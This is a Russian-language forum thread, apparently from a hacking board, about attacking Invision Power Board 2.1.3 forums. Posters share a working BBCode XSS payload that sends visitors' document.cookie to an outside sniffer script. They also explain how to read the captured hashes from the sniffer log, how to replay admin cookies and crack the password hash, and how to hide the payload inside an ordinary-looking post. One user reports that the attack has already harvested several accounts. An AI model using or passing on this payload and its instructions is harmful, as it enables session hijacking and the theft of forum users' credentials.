Не подскажите какие уязвимости присутствуют в Invision Power Board (Free Trial) v2.1.3 © 2005 а то ни где не нашёл!
HTML: [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Ploho ishesh
ребята, вставляю хеш и ид админа в куки (речь идет о ипб 2.1.3) но всё ровно не могу зайти под админом, хотя в ипб 1.3 всё отлично работает. в чём дело не подскажете?
Потому что в 2.х в админке еще раз проверяеться пасс... тебе надо пасс админа а не кго куки. а так как это 2.х ты не разшифруеш мд5 без соли... разшифровывай и заходи в админку
narod objasnite plizz soderjimoe etogo koda wj@wj - leviy email http://www.wj.com - leviy url a za4em tam `=`? nu dalwe vrode vse ponatno... pasipa
там в админке можно включать привязку сессии к ипу и браузеру. по умолчанию привязка только к ипу, насколько я помню.
Вот например мне нужно поместить этот код на форум: http://forum.la2world.ru/index.php?showtopic=3208&st=40 Что должно быть написано в коде? Замест wj@wj, мой е-майл, а замест етого: http://www.wj.com`=`].com что должно быть?
Эээ...да тебе вообще ничего не надо заменять )))) тебе просто код Джордана надо фтыкнуть и все а далее смотри на логе сниффера, который указал, в коде Джордана это - http://antichat.ru/sniff/log.php и ищи свои данные (только сначала удостоверься, пашет ли вообще код )
Здесь еще одна проблема... Когда ставлю етот код, то в IE все норм, тоесть в сообщении ничего не отображается, НО в Opera отображается такое: .com'>[email protected] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Можно ли ето как-нить убрать?
ОК, попробую, но код пашет, т.к. в ИЕ не отображается и на снифер пришло уже 3 ИД с хешами.... Еще вопрос... Можно-ли как-то добавить в пост с кодом, что-бы пост был не пустой, а там что-то отображалось? Я пробовал записять в начало, не получилось....
Ну дак просто вставляешь скрипт, например: [script] а потом текст! и все - идет типо скрипт и текст, скрипт не видно а текст видно, мол ты просто запостил и все